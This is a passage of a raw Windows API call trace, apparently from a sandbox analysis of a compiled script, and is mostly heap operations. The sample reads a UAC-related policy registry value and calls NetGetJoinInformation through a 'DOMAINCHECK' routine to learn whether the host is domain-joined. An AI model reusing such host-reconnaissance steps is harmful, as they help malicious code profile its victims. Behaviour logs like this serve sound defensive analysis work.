HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690600 | out: hHeap=0x650000) returned 1 [0072.795] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", ulOptions=0x0, samDesired=0x20119, phkResult=0x61f168 | out: phkResult=0x61f168*=0x134) returned 0x0 [0072.795] RegQueryValueExW (in: hKey=0x134, lpValueName="EnableLinkedConnections", lpReserved=0x0, lpType=0x61f174, lpData=0x0, lpcbData=0x61f164*=0x0 | out: lpType=0x61f174*=0x0, lpData=0x0, lpcbData=0x61f164*=0x0) returned 0x2 [0072.795] RegCloseKey (hKey=0x134) returned 0x0 [0072.795] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x691578 | out: hHeap=0x650000) returned 1 [0072.795] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690590 | out: hHeap=0x650000) returned 1 [0072.795] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b240 | out: hHeap=0x650000) returned 1 [0072.795] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690690 | out: hHeap=0x650000) returned 1 [0072.795] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a910 | out: hHeap=0x650000) returned 1 [0072.795] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690640 | out: hHeap=0x650000) returned 1 [0072.795] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a670 | out: hHeap=0x650000) returned 1 [0072.795] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b228 | out: hHeap=0x650000) returned 1 [0072.795] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a748 | out: hHeap=0x650000) returned 1 [0072.795] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a928 | out: hHeap=0x650000) returned 1 [0072.795] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cd98 | out: hHeap=0x650000) returned 1 [0072.795] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690870 | out: hHeap=0x650000) returned 1 [0072.795] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cd98 [0072.795] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a928 [0072.795] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690870 [0072.795] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a928 | out: hHeap=0x650000) returned 1 [0072.795] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68ced8 [0072.796] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a928 [0072.796] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a748 [0072.796] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a6a0 | out: hHeap=0x650000) returned 1 [0072.796] PeekMessageW (in: lpMsg=0x61f52c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f52c) returned 0 [0072.796] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690640 [0072.796] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690690 [0072.796] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cfc8 [0072.796] CharUpperBuffW (in: lpsz="DOMAINCHECK", cchLength=0xb | out: lpsz="DOMAINCHECK") returned 0xb [0072.796] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cfc8 | out: hHeap=0x650000) returned 1 [0072.796] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690690 | out: hHeap=0x650000) returned 1 [0072.796] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76a6a0 [0072.796] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b4f8 [0072.796] PeekMessageW (in: lpMsg=0x61f10c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f10c) returned 0 [0072.796] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690690 [0072.796] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690690 | out: hHeap=0x650000) returned 1 [0072.796] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cfc8 [0072.796] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b228 [0072.796] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690690 [0072.796] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b228 | out: hHeap=0x650000) returned 1 [0072.796] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x770f98 [0072.796] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b228 [0072.796] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cfa0 [0072.796] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a670 [0072.796] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690590 [0072.796] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a670 | out: hHeap=0x650000) returned 1 [0072.796] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692d08 [0072.797] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a670 [0072.797] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cf00 [0072.797] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a910 [0072.797] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690600 [0072.797] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a910 | out: hHeap=0x650000) returned 1 [0072.797] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692d40 [0072.797] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a910 [0072.797] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cf28 [0072.797] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b240 [0072.797] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690630 [0072.797] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b240 | out: hHeap=0x650000) returned 1 [0072.797] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692d78 [0072.797] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b240 [0072.797] PeekMessageW (in: lpMsg=0x61f10c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f10c) returned 0 [0072.797] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cf78 [0072.797] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a658 [0072.797] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6905d0 [0072.797] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a658 | out: hHeap=0x650000) returned 1 [0072.797] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cf50 [0072.797] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a658 [0072.797] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a640 [0072.797] PeekMessageW (in: lpMsg=0x61f10c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f10c) returned 0 [0072.797] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690890 [0072.797] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690670 [0072.798] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b420 [0072.798] CharUpperBuffW (in: lpsz="_WINAPI_NETGETJOININFORMATION", cchLength=0x1d | out: lpsz="_WINAPI_NETGETJOININFORMATION") returned 0x1d [0072.798] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b420 | out: hHeap=0x650000) returned 1 [0072.798] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690670 | out: hHeap=0x650000) returned 1 [0072.798] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76b258 [0072.798] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690670 [0072.798] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a700 [0072.798] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690670 | out: hHeap=0x650000) returned 1 [0072.798] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0072.798] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a970 [0072.798] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690670 [0072.798] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a970 | out: hHeap=0x650000) returned 1 [0072.798] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d018 [0072.798] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a970 [0072.798] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b270 [0072.798] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b420 [0072.798] PeekMessageW (in: lpMsg=0x61ebdc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebdc) returned 0 [0072.798] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d040 [0072.798] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b1b0 [0072.798] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690830 [0072.798] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a688 [0072.798] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b1c8 [0072.798] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690850 [0072.798] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b1c8 | out: hHeap=0x650000) returned 1 [0072.798] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d068 [0072.798] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b1c8 [0072.799] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690820 [0072.799] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a940 [0072.799] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690820 | out: hHeap=0x650000) returned 1 [0072.799] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b198 [0072.799] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690820 [0072.799] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a8b0 [0072.799] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690820 | out: hHeap=0x650000) returned 1 [0072.799] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a8c8 [0072.799] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690820 [0072.799] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b138 [0072.799] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690820 | out: hHeap=0x650000) returned 1 [0072.799] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b150 [0072.799] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690820 [0072.799] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b168 [0072.799] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690820 | out: hHeap=0x650000) returned 1 [0072.799] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b0f0 [0072.799] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690820 [0072.799] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b108 [0072.799] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690820 | out: hHeap=0x650000) returned 1 [0072.799] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b120 [0072.799] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690820 [0072.799] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b0a8 [0072.799] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690820 | out: hHeap=0x650000) returned 1 [0072.799] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b0c0 [0072.799] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690820 [0072.799] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b0d8 [0072.800] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690820 | out: hHeap=0x650000) returned 1 [0072.800] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b060 [0072.800] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690820 [0072.800] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b078 [0072.800] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690820 | out: hHeap=0x650000) returned 1 [0072.800] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b540 [0072.800] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d068 | out: hHeap=0x650000) returned 1 [0072.800] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b090 [0072.800] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690820 [0072.800] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690820 | out: hHeap=0x650000) returned 1 [0072.800] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690820 [0072.800] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b018 [0072.800] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0072.800] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b030 [0072.800] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690840 [0072.800] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690810 [0072.800] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b048 [0072.800] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b030 | out: hHeap=0x650000) returned 1 [0072.800] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690840 | out: hHeap=0x650000) returned 1 [0072.800] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b048 | out: hHeap=0x650000) returned 1 [0072.800] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690810 | out: hHeap=0x650000) returned 1 [0072.800] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d068 [0072.800] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690810 [0072.800] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b048 [0072.800] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690840 [0072.801] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690800 [0072.801] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b030 [0072.801] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b048 | out: hHeap=0x650000) returned 1 [0072.801] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690840 | out: hHeap=0x650000) returned 1 [0072.801] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b030 | out: hHeap=0x650000) returned 1 [0072.801] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690800 | out: hHeap=0x650000) returned 1 [0072.801] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690800 [0072.801] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b030 [0072.801] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690840 [0072.801] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6907f0 [0072.801] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b048 [0072.801] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b030 | out: hHeap=0x650000) returned 1 [0072.801] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690840 | out: hHeap=0x650000) returned 1 [0072.801] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b048 | out: hHeap=0x650000) returned 1 [0072.801] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6907f0 | out: hHeap=0x650000) returned 1 [0072.801] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6907f0 [0072.801] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b048 [0072.801] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690840 [0072.801] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6907e0 [0072.801] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b030 [0072.801] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b048 | out: hHeap=0x650000) returned 1 [0072.801] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690840 | out: hHeap=0x650000) returned 1 [0072.801] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b030 | out: hHeap=0x650000) returned 1 [0072.801] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6907e0 | out: hHeap=0x650000) returned 1 [0072.801] LoadLibraryW (lpLibFileName="Netapi32.dll") returned 0x75640000 [0072.811] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae80 [0072.811] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6907e0 [0072.811] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NetGetJoinInformation", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0072.811] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x16) returned 0x6f9508 [0072.811] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NetGetJoinInformation", cchWideChar=22, lpMultiByteStr=0x6f9508, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NetGetJoinInformation", lpUsedDefaultChar=0x0) returned 22 [0072.811] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae80 | out: hHeap=0x650000) returned 1 [0072.811] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d158 [0072.811] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9508 | out: hHeap=0x650000) returned 1 [0072.811] GetProcAddress (hModule=0x75640000, lpProcName="NetGetJoinInformation") returned 0x75662c3f [0072.811] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d158 | out: hHeap=0x650000) returned 1 [0072.811] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6907e0 | out: hHeap=0x650000) returned 1 [0072.811] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d158 [0072.812] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6907e0 [0072.812] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690840 [0072.812] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6907d0 [0072.812] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20002) returned 0x694cf8 [0072.812] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6907e0 | out: hHeap=0x650000) returned 1 [0072.812] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690840 | out: hHeap=0x650000) returned 1 [0072.812] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6907d0 | out: hHeap=0x650000) returned 1 [0072.812] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d158 | out: hHeap=0x650000) returned 1 [0072.812] NetGetJoinInformation (in: lpServer="", lpNameBuffer=0x61e578, BufferType=0x61e590 | out: lpNameBuffer=0x61e578*="WORKGROUP", BufferType=0x61e590) returned 0x0 [0072.862] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690790 [0072.862] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x214) returned 0x6b6fb8 [0072.862] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ada8 [0072.862] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76adc0 [0072.862] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad48 [0072.862] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad60 [0072.862] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690780 [0072.862] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad60 | out: hHeap=0x650000) returned 1 [0072.862] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690780 | out: hHeap=0x650000) returned 1 [0072.862] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad48 | out: hHeap=0x650000) returned 1 [0072.862] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad48 [0072.862] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad60 [0072.862] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad78 [0072.862] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690780 [0072.862] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x694cf8 | out: hHeap=0x650000) returned 1 [0072.865] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad00 [0072.866] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad18 [0072.866] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad30 [0072.866] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690770 [0072.866] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad30 | out: hHeap=0x650000) returned 1 [0072.866] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690770 | out: hHeap=0x650000) returned 1 [0072.866] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad18 | out: hHeap=0x650000) returned 1 [0072.866] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad18 [0072.866] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad30 [0072.866] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76acb8 [0072.866] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690770 [0072.866] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76acb8 | out: hHeap=0x650000) returned 1 [0072.866] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690770 | out: hHeap=0x650000) returned 1 [0072.866] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad30 | out: hHeap=0x650000) returned 1 [0072.866] FreeLibrary (hLibModule=0x75640000) returned 1 [0072.869] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690810 | out: hHeap=0x650000) returned 1 [0072.869] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690800 | out: hHeap=0x650000) returned 1 [0072.869] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6907f0 | out: hHeap=0x650000) returned 1 [0072.869] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d068 | out: hHeap=0x650000) returned 1 [0072.869] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b018 | out: hHeap=0x650000) returned 1 [0072.869] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690820 | out: hHeap=0x650000) returned 1 [0072.869] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a940 | out: hHeap=0x650000) returned 1 [0072.869] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b1c8 | out: hHeap=0x650000) returned 1 [0072.869] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a8b0 | out: hHeap=0x650000) returned 1 [0072.869] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b198 | out: hHeap=0x650000) returned 1 [0072.869] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b138 | out: hHeap=0x650000) returned 1 [0072.869] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a8c8 | out: hHeap=0x650000) returned 1 [0072.869] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b168 | out: hHeap=0x650000) returned 1 [0072.869] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b150 | out: hHeap=0x650000) returned 1 [0072.869] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b108 | out: hHeap=0x650000) returned 1 [0072.869] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b0f0 | out: hHeap=0x650000) returned 1 [0072.869] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b0a8 | out: hHeap=0x650000) returned 1 [0072.869] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b120 | out: hHeap=0x650000) returned 1 [0072.869] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b0d8 | out: hHeap=0x650000) returned 1 [0072.869] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b0c0 | out: hHeap=0x650000) returned 1 [0072.869] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b078 | out: hHeap=0x650000) returned 1 [0072.869] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b060 | out: hHeap=0x650000) returned 1 [0072.869] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b090 | out: hHeap=0x650000) returned 1 [0072.869] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b540 | out: hHeap=0x650000) returned 1 [0072.870] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0072.870] PeekMessageW (in: lpMsg=0x61ebdc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebdc) returned 0 [0072.870] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690850 [0072.870] 